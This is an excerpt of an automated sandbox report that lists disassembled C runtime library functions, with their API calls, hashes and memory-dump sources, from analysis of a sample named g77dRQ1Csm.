_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 0316F788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0316F7CC

Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB38
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB4A
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB5C
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB6E
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB80
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EB92
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBA4
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBB6
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBC8
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBDA
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBEC
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EBFE
Part of subcall function 0316EB1B: _free.LIBCMT ref: 0316EC10

_free.LIBCMT ref: 0316F7C1

Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529

_free.LIBCMT ref: 0316F7E3
_free.LIBCMT ref: 0316F7F8
_free.LIBCMT ref: 0316F803
_free.LIBCMT ref: 0316F825
_free.LIBCMT ref: 0316F838
_free.LIBCMT ref: 0316F846
_free.LIBCMT ref: 0316F851
_free.LIBCMT ref: 0316F889
_free.LIBCMT ref: 0316F890
_free.LIBCMT ref: 0316F8AD
_free.LIBCMT ref: 0316F8C5

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 6cda69b5dd93b4e94139557086e7ded93239983b6e77ef902a3f640f06c31898
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: 81317E326003019FEB30EAF8E885B5AB3EDEF08254F1854A9E458DB150DF32E972C721

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

/BB, xrefs: 0042342E
log10, xrefs: 00423293, 004232E3
asin, xrefs: 004233B5
exp, xrefs: 0042330E, 00423370
sqrt, xrefs: 004233CD
log, xrefs: 004232EF, 004232FB
pow, xrefs: 0042332D, 004233D9, 004233EC
acos, xrefs: 004233C1

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 03166E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03166EA0

Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529

_free.LIBCMT ref: 03166EAC
_free.LIBCMT ref: 03166EB7
_free.LIBCMT ref: 03166EC2
_free.LIBCMT ref: 03166ECD
_free.LIBCMT ref: 03166ED8
_free.LIBCMT ref: 03166EE3
_free.LIBCMT ref: 03166EEE
_free.LIBCMT ref: 03166EF9
_free.LIBCMT ref: 03166F07

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: a74e59ab135270fa331d85b213ae7f364406a1192637f161ef7d34411ea3b14e
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: F411867A510208BFCB11EFD5C852DDD3BA5EF08398B5145A5FE088F225DB32EA60DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 03151417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0315141C
std::_Lockit::_Lockit.LIBCPMT ref: 0315142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0315146B

Part of subcall function 031580E1: _Yarn.LIBCPMT ref: 03158100
Part of subcall function 031580E1: _Yarn.LIBCPMT ref: 03158124

std::bad_exception::bad_exception.LIBCMT ref: 0315148C
__CxxThrowException@8.LIBVCRUNTIME ref: 0315149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 031514BD
std::_Lockit::~_Lockit.LIBCPMT ref: 0315152E

Strings

n~B, xrefs: 03151417

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: d64efa20ca70219ceecf6f68ce97e479af59ba4e8cb170b355cae71e7df9fea3
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 99317072804B40EFC732DF69D84065AFBF4FF4C710B548A2FE4AA96A40C774AA01CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: ce3c0b23ff705215117f8776eb420a15f63c887abcc2888264ee72b3a4de71bc
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: ce3c0b23ff705215117f8776eb420a15f63c887abcc2888264ee72b3a4de71bc
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 03169514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: 7df4c609087cdeaa16c6eaf0eb6dd5c4482741dbee363e0237d2b93b6535b28d
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: 94C1AE75A04349AFDF15DFE8C890BADBBB4AF0D310F084199E941AB391C7349962CF65

Uniqueness

Uniqueness Score: -1.00%

Function 03164CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

_memcmp.LIBVCRUNTIME ref: 03164F5B
_free.LIBCMT ref: 03164FCC
_free.LIBCMT ref: 03164FE5
_free.LIBCMT ref: 03165017
_free.LIBCMT ref: 03165020
_free.LIBCMT ref: 0316502C

Strings

C, xrefs: 03164E19

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction ID: 92b50f4d932c0f8310b70bb287eeb6f360a32dddacc5613e71e31296fc348b7d
Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction Fuzzy Hash: 50B14875A012299FDB24DF59C884AADB7B9FF08304F1545EAE949A7350DB31AEA0CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

|B, xrefs: 004146B1
B, xrefs: 0041461F

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 0316F03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0316F0AD
_free.LIBCMT ref: 0316F0BB
_free.LIBCMT ref: 0316F1E9
_free.LIBCMT ref: 0316F1F4

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: abcf625ff7969a94618e6e58a4efa54025cc67bea20c63d1569e041bbe35c6d4
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 1061E676D00305AFDB20DFE8D841B9ABBF5EF4C750F1441AAE944EB284DB709952CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 03164833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03167CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03167CDE

_free.LIBCMT ref: 0316493E
_free.LIBCMT ref: 03164955
_free.LIBCMT ref: 03164974
_free.LIBCMT ref: 0316498F
_free.LIBCMT ref: 031649A6

Strings

B, xrefs: 03164886

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: 19d0f45e8d004b344557c8442f1c0a0b12a247fb3e71bab805dfa7dc7f912ba3
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: 6D51D835A00304AFDB24DFEADC41A6AB7F8EF4D724B54456DE849DB250EB31D921CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03165C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,031663EF,?,?,?,?,?,?), ref: 03165CBC
__fassign.LIBCMT ref: 03165D37
__fassign.LIBCMT ref: 03165D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03165D78
WriteFile.KERNEL32(?,?,00000000,031663EF,00000000,?,?,?,?,?,?,?,?,?,031663EF,?), ref: 03165D97
WriteFile.KERNEL32(?,?,00000001,031663EF,00000000,?,?,?,?,?,?,?,?,?,031663EF,?), ref: 03165DD0

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: fbe2b812aa6fdbfc61d4455dad84f48c3d948a4cd02b634aa7ee66823bc6c972
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: 1951B170A002499FDF20CFA8DC85AEEFBF9EF09300F14416AE955E7291D7309961CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
